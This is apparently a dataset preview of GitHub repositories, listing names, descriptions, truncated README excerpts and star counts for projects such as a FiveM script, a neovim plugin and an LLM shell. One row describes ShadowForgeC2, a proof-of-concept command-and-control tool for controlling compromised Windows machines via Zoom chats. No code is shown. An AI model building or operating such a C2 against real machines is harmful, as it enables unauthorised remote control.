</a>
</p>
# @stricahq/ouroboros-network-js
Ouroboros network library written in typescript with nodejs streaming module. This library has been developed with extensive testing and res... | 12 | 1 |
BuddyNotFound/bbv-drop | https://github.com/BuddyNotFound/bbv-drop | [FREE] FiveM - Supply Drop Script for QBCore/ESX | # bbv-drop
[FREE] FiveM - Supply Drop Script for QBCore/ESX
<a href='https://ko-fi.com/G2G0N78P7' target='_blank'><img height='36' style='border:0px;height:36px;' src='https://storage.ko-fi.com/cdn/kofi4.png?v=3' border='0' alt='Buy Me a Coffee at ko-fi.com' /></a>
 is designed to be modular and extendable. This repository contains resources that should be enough for anyone to design, manufacture, and sell their Sidecar accessories. These files are license... | 16 | 3 |
0xEr3bus/ShadowForgeC2 | https://github.com/0xEr3bus/ShadowForgeC2 | ShadowForge Command & Control - Harnessing the power of Zoom's API, control a compromised Windows Machine from your Zoom Chats. | <h1 align="center">
ShadowForge C2
</h1>
ShadowForge Command & Control - Harnessing the power of Zoom's API, control a compromised Windows Machine from your Zoom Chats.
## About ShadowForge C2
ShadowForge C2 is an API-centric Proof of Concept, similar to other C2s. The implant works with HTTP/v2 and TLS conne... | 33 | 4 |
TransparentLC/saizeriya | https://github.com/TransparentLC/saizeriya | 萨莉亚随机点餐 | # 萨莉亚随机点餐
https://akarin.dev/saizeriya/
如标题所示。
很久以前群友的 bot 里有这样的功能(源代码可能是 [Ruan1337/saizeriyarandom.github.io](https://github.com/Ruan1337/saizeriyarandom.github.io)),在做自己的 bot 的时候尝试着自己重新写了一个(本质上其实是用动态规划解决的子集和问题),后来 bot 没办法用了就打算做成独立的网页版。
使用的是[广东地区的菜单](https://gz-saizeriya.com.cn/portal/list/index/id/19.html),改一下数据应... | 13 | 0 |
vsraptor/aide | https://github.com/vsraptor/aide | LLM shell and document interogator | ## What is this ?
This in general is a Shell around Large Language Model (LLM), at least for now.
It is based on [privateGPT](https://github.com/imartinez/privateGPT) code, which I refactored, componetized and enchanced with additional features.
In short this tool allows you to interact with different document-sets O... | 12 | 3 |
realOxy/touchbar | https://github.com/realOxy/touchbar | Touchbar is a Video Clipper component made by Jetpack Compose. | # Compose TouchBar
TouchBar is a Video Clipper component made by Jetpack Compose.
(control the clipper handles and display video thumbnails only)
[](https://android-arsenal.com/api?level=21)
[](htt... | 11 | 0 |
remotemcu/adin-llvm | https://github.com/remotemcu/adin-llvm | null | # ADIN LLVM Fork: Memory Operation Hooking
[](https://github.com/remotemcu/adin-llvm/actions/workflows/ubuntu.yml)
[](https://github.com/remotemc... | 32 | 1 |
shurco/goclone | https://github.com/shurco/goclone | 🌱 goclone - clone websites in a matter of seconds | # 🌱 goclone
<a href="https://github.com/shurco/goclone/releases"><img src="https://img.shields.io/github/v/release/shurco/goclone?sort=semver&label=Release&color=651FFF"></a>
<a href="https://goreportcard.com/report/github.com/shurco/goclone"><img src="https://goreportcard.com/badge/github.com/shurco/goclone"></a>
<a... | 30 | 1 |
ibnumusyaffa/simple-react-typescript-cheatsheet | https://github.com/ibnumusyaffa/simple-react-typescript-cheatsheet | Simple & Opiniated React x Typescript Cheatsheet | # Simple React Typescript Cheatsheet
- [Simple React Typescript Cheatsheet](#simple-react-typescript-cheatsheet)
- [Typing props with inline type](#typing-props-with-inline-type)
- [Typing props with Type](#typing-props-with-type)
- [Typing props with default value](#typing-props-with-default-value)
- [Typing ... | 172 | 8 |
KaitlynEthylia/TreePin | https://github.com/KaitlynEthylia/TreePin | A lightweight neovim plugin for pinning fragments of code to the screen. | # TreePin
A lightweight neovim plugin for pinning fragments of code to
the screen.
## Install
### Lazy
```
{
'KaitlynEthylia/TreePin',
dependencies = 'nvim-treesitter/nvim-treesitter',
init = function() require('treepin').setup() end,
}
```
### Packer
```lua
use {
'KaitlynEthylia/TreePin',
requires = {'nvim-tree... | 26 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.